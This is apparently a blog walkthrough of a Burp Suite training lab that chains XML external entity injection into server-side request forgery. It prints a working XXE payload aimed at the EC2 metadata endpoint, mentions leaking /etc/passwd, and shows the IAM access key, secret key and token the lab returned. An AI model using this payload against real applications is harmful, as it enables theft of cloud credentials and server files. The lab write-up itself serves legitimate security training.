Open in app

Sign in

Write

Sign in

Burp Suite Lab — Exploiting XXE to perform SSRF attacks | WalkThrough

WraithOP
3 min readDec 25, 2021

Introduction

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server side request forgery (SSRF) attacks and now we are going to see how it’s done.

Target

This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.

Detection

As we can see website is using XML code for the request , lets try to modify it ;) .

Leaks /etc/passwd

So, this stock parameter is vulnerable to XXE attacks . Now lets check for SSRF attack.

Exploitation

Payload used :-

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/'>]><stockCheck><productId>&test;</productId><storeId>1</storeId></stockCheck>

Result: Success

Now, we have to gather the sensitive information.

To understand the part of getting access of EC2 Metadata and gaining the secret key , i would recommend to watch this video.

And,

"Invalid product ID: {
  "Code" : "Success",
  "LastUpdated" : "2021-12-25T00:58:57.127618174Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "qDCrjy0AaGQCWz8WBVuB",
  "SecretAccessKey" : "lbNES1djjQiVgc18Ay0ONAJ6RjT1QkHMfhpi7z6Q",
  "Token" : "UvLHsxfn3cqSLHfDcNFp7k8X6roFSBKFDvQFWeBkDwzVZBVRRXtqRwlKKb5f7fT5T4T7uyEEWi52D3DMZUId0mPbDyrMh8jwlweNFbodOV5cDzxkUE5QoCLCn8YqRk490TX8KqW1pt93lnErjSZK8HMgxEi1J3CKjcueXFnThrq8FDeC3yo1ZCLPP2zJVoz6queBLzAgramaNQ9CbkE9qJhZwDi8Hm5f37A9Z9w3oLVBjSnB61eWRg4bSC4w4qHv",
  "Expiration" : "2027-12-24T00:58:57.127618174Z"
}"

We have successfully obtained the server’s IAM secret access key from the EC2 metadata endpoint using XXE vulnerability to perform SSRF.

Ssrf
Xxe
Penetration Testing
Burpsuite
Walkthrough

--

--

WraithOP

Written by WraithOP

29 Followers

https://www.hackwithwraith.com/

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams